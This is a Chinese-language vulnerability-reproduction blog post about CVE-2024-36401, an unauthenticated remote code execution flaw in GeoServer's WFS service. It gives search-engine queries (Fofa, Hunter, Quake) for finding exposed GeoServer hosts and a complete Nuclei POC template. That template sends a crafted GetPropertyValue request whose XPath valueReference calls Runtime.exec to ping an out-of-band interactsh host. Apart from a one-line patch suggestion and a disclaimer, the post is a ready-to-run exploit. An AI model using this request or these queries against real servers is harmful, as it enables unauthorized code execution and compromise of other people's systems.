漏洞介绍
❝
GeoServer 是一个开源服务允许用户共享和编辑地理空间数据。在版本 2.23.6、2.24.4 和 2.25.2 之前,多个 OGC 请求参数允许未经身份验证的用户通过针对默认 GeoServer 安装的特制输入进行远程代码执行 (RCE),因为将属性名称评估为 XPath 表达式会不安全。GeoServer 调用的 GeoTools 库 API 评估要素类型的属性/属性名称,从而不安全地将它们传递给 commons-jxpath 库,该库在评估 XPath 表达式时可以执行任意代码。
❞
资产测绘
-
「Fofa」
❝
app="GeoServer"
❞
-
「Hunter」
❝
app.name="GeoServer"
❞
-
「Quake」
❝
app="GeoServer"
❞
漏洞复现
「1、构造数据包」
「2、查看dnslog」
POC
https://github.com/onewinner/POCS/blob/main/Yaml/CVE-2024-36401-GeoServer-wfs-rce.yaml
id: CVE-2024-36401-GeoServer-wfs-rce info: name: GeoServer 远程代码执行漏洞(CVE-2024-36401) author: god severity: critical description: GeoServer 远程代码执行漏洞(CVE-2024-36401) http: - raw: - |- @timeout: 30s POST /geoserver/wfs HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml Content-Length: 324 <wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0' valueReference='exec(java.lang.Runtime.getRuntime(),"ping {{interactsh-url}} -c 2")'> <wfs:Query typeNames='topp:states'/> </wfs:GetPropertyValue> max-redirects: 3 matchers-condition: and matchers: - type: word words: - "dns" part: interactsh_protocol
修复方案
❝
官方已发布安全补丁,建议联系厂商打补丁或升级版本。 引入Web应用防火墙防护,配置接口拦截策略。 ❞
原文始发于微信公众号(浅梦安全):【漏洞复现|含POC】GeoServer 最新前台RCE wfs 远程代码执行漏洞(CVE-2024-36401)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论